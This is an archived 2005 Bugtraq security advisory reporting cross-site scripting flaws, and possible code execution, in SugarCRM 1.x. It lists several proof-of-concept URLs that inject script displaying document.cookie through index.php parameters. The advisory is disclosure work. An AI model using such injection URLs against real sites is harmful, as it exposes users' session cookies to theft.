[38042] in bugtraq

home help back first fref pref prev next nref lref last post

Cross Site Scripting Vulnerabilities and Possible Code Execution

daemon@ATHENA.MIT.EDU (Joxean Koret)
Sat Jan 1 17:16:31 2005

From: Joxean Koret <joxeankoret@yahoo.es>
To: bugtraq@securityfocus.com,
        Full Disclosure <full-disclosure@lists.netsys.com>,
        Secunia <vuln@secunia.com>,
        Security Tracker <bugs@securitytracker.com>
Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="=-sAl3l4aiY8J4OeFoMZRp"
Date: Sat, 01 Jan 2005 19:58:44 +0000
Message-Id: <1104609524.17665.4.camel@nemobox>
Mime-Version: 1.0


--=-sAl3l4aiY8J4OeFoMZRp
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable

---------------------------------------------------------------------------=
-
Cross Site Scripting Vulnerabilities and Possible Code Execution in
SugarCRM
---------------------------------------------------------------------------=
-

Author: Jose Antonio Coret (Joxean Koret)
Date: 2004=20
Location: Basque Country

---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SugarCRM 1.X - Manage leads, opportunities, contacts and more inside of
a=20
state-of-the-art user interface. Built on PHP and MySQL

Web : http://sugarcrm.sourceforge.net

---------------------------------------------------------------------------

Vulnerabilities:
~~~~~~~~~~~~~~~~

A. Cross Site Scripting Vulnerability

A1. In the main script (index.php) various parameters, that are used to
write the
html code, not are verified.=20

At least the following URLs are vulnerables to XSS (Cross Site
Scripting) attacks :=20

http://<site-with-sugarcrm>/sugarcrm/index.php?module=3DContacts&action=3DE=
ditView&return_module=3D"><script>alert(document.cookie)</script>&return_ac=
tion=3Dindex

http://<site-with-sugarcrm>/sugarcrm/index.php?module=3DContacts&action=3DE=
ditView&return_module=3D&return_action=3D"><script>alert(document.cookie)</=
script>

http://<site-with-sugarcrm>/sugarcrm/index.php?name=3D%22%3E%3Cscript%
3Ealert%28document.cookie%29%3C%2Fscript%
3E&address_city=3D&website=3D&phone=3D&action=3DListView&query=3Dtrue&modul=
e=3DAccounts&button=3DSearch

And the following are XSS vulnerables and, may be, arbitrary PHP remote
code execution=20
vulnerables as well :=20

http://<site-with-sugarcrm>/sugarcrm/index.php?action=3DDetailView&module=
=3DAccounts"><script>alert(document.cookie)</script>&record=3Dd676f046-1be5=
-dc36-114e-4138f972bf5d

http://<site-with-sugarcrm>/sugarcrm/index.php?action=3DDetailView&module=
=3DAccounts''''&record=3D[RECORD ID]"><script>alert(document.cookie)</scrip=
t>


The fix:
~~~~~~~~

All problems are fixed in the latests versions availables at the
sugarcrm site.
Go to http://sugarcrm.sourceforge.net site for more info about the new
versions.

Disclaimer:
~~~~~~~~~~~

The information in this advisory and any of its demonstrations is
provided
"as is" without any warranty of any kind.

I am not liable for any direct or indirect damages caused as a result of
using the information or demonstrations provided in any part of this
advisory.=20

---------------------------------------------------------------------------

Contact:
~~~~~~~~

	Joxean Koret at joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es




--=-sAl3l4aiY8J4OeFoMZRp
Content-Type: application/pgp-signature; name=signature.asc
Content-Description: This is a digitally signed message part

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQBB1wDzU6rFMEYDrlERAqbsAJsG6veInnKs+QKslkJmbWk3DabCQgCeMc+/
pCkr5Y5qUZXNdTPA+jh5Fs8=
=RXHm
-----END PGP SIGNATURE-----

--=-sAl3l4aiY8J4OeFoMZRp--
home help back first fref pref prev next nref lref last post